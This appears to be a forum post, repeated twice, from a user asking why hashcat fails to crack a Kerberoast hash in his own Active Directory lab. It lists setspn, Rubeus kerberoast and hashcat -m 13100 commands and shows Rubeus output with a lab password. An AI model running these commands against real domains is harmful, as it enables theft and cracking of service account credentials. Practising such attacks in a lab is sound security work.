Hi,
today I tried the Kerberoasting attack for the first time in my lab. I created a new account and set a spn as follows:
setspn -a fs01/SVC_SQLService.tealtest.de:1433 tealtest\sql_svc
Then I saved the hash with rubeus:
Rubeus.exe kerberoast /outfile:.\hash.txt
I tried to crack the hash with the current hashcat version:
hashcat64.exe -m 13100 -O C:\hash.txt C:\realpw.txt --force
The wordlist contains only the correct password but nevertheless hashcat does not succeed.
The password of the account is Test123. which can also be confirmed with rubeus:
v1.5.0
[+] STUPENDOUS => svc_sql:Test123.
[*]Saved TGT into svc_sql.kirbi
I googled and tried now for hours. Any advice?
Thanks Alex
today I tried the Kerberoasting attack for the first time in my lab. I created a new account and set a spn as follows:
setspn -a fs01/SVC_SQLService.tealtest.de:1433 tealtest\sql_svc
Then I saved the hash with rubeus:
Rubeus.exe kerberoast /outfile:.\hash.txt
I tried to crack the hash with the current hashcat version:
hashcat64.exe -m 13100 -O C:\hash.txt C:\realpw.txt --force
The wordlist contains only the correct password but nevertheless hashcat does not succeed.
The password of the account is Test123. which can also be confirmed with rubeus:
v1.5.0
[+] STUPENDOUS => svc_sql:Test123.
[*]Saved TGT into svc_sql.kirbi
I googled and tried now for hours. Any advice?
Thanks Alex